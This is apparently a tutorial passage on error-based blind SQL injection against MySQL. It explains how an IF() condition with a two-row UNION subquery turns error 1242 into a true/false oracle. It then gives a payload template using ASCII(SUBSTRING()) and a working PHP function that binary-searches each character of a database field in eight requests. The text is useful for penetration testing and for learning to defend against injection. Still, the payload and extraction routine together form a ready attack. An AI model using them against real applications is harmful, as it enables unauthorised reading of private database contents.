1=IF(1=1,1,(SELECT 1 UNION SELECT 2)) works because 1=1 is true, so IF() returns 1 and the whole condition holds. When the condition is false instead, for example 1=2, MySQL evaluates the ELSE branch, and the UNION of the two SELECTs yields two rows where a single scalar value is expected. MySQL then aborts the query with error 1242, 'Subquery returns more than 1 row'. Even if the application hides the error and only returns a blank page, the difference between the two responses is enough to tell whether the condition was true or false.
Now that we have a true case and a false case, we can brute-force field values one character at a time: ASCII(SUBSTRING(field_name,position,1)) gives the character code at position, and we compare it against a guessed value inside the IF() condition.
Looping through every possible ASCII value is not a good idea: it generates a huge number of requests, one per candidate. Instead, do a binary search, which needs O(log n) requests rather than O(n). For a full byte there are 256 possibilities (0 to 255). The first check is whether the value is 128 or higher (256/2). If it is, the value lies between 128 and 255, so the next check is whether it is at least 128+64=192; if it is not, the value lies between 128 and 191. Halving the range like this narrows it down to a single value in exactly 8 requests per character. An implementation in PHP can look something like this:
/**
 * Binary-search one byte of a blind-injection result.
 *
 * $injection is a printf-style template holding the oracle condition; its %d
 * placeholder receives the candidate threshold, for example:
 *   "1=IF(ASCII(SUBSTRING(field,1,1))<%d,1,(SELECT 1 UNION SELECT 2))"
 * $this->get() must return true when the page responds as in the TRUE case,
 * i.e. when the byte is below the threshold.
 *
 * The search keeps the invariant $min <= byte < $max, so pass $max = 256 to
 * cover every possible byte value (8 requests per character).
 */
private function determineValue($injection, $min = 0, $max = 256) {
    // the midpoint is relative to $min, so a non-zero $min works as well
    $value = $min + (int) ceil(($max - $min) / 2);
    while ($max - $min > 1) {
        // TRUE: the byte is below $value, so it becomes the new upper bound
        // FALSE: the byte is $value or higher, so it becomes the new lower bound
        if ($this->get(sprintf($injection, $value))) {
            $max = $value;
        } else {
            $min = $value;
        }
        $value = $min + (int) ceil(($max - $min) / 2);
    }
    // only one candidate left in [$min, $max)
    return $min;
}
That's about it..